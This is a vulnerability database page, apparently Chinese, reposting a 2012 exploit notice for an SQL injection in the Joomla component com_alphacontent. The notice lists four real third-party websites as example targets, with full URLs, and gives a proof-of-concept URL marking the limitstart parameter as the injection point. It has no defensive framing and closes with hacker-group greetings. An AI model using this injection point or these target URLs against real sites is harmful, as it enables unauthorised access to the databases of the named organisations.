Joomla Alphacontent SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047287 漏洞类型
发布时间 2012-06-12 更新时间 2012-06-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060133
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##################################################
# Exploit Title: joomla component (com_alphacontent) SQL injection Vulnerability
#Vendor: http://extensions.joomla.org/extensions/directory-a-documentation/directory/5023
# Date: 22/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category:: webapps
# Example Sites : 
http://www.camaraconstruccionquito.ec/index.php?option=com_alphacontent&section=15&Itemid=1&lang=es&limitstart=1240
http://www.mundoquimeras.com/index.php?option=com_alphacontent&section=35&Itemid=94&lang=en&limitstart=10
http://www.masmallorca.de/index.php?option=com_alphacontent&section=weblinks&Itemid=1&lang=de&limitstart=72
http://www.magenta.gr/index.php?option=com_alphacontent&Itemid=1&lang=en&section=3&limitstart=10

# Tested on: linux + windows
##################################################

[~]Exploit/p0c :
http://www.site.com/index.php?option=com_alphacontent&section=weblinks&Itemid=1&lang=de&limitstart=[sqli]

Greetz: [ Insecurity Peru ] - [ Rs4 - B4nz0k - FailSoft - W4rn1ng - Dedalo - Maztor ]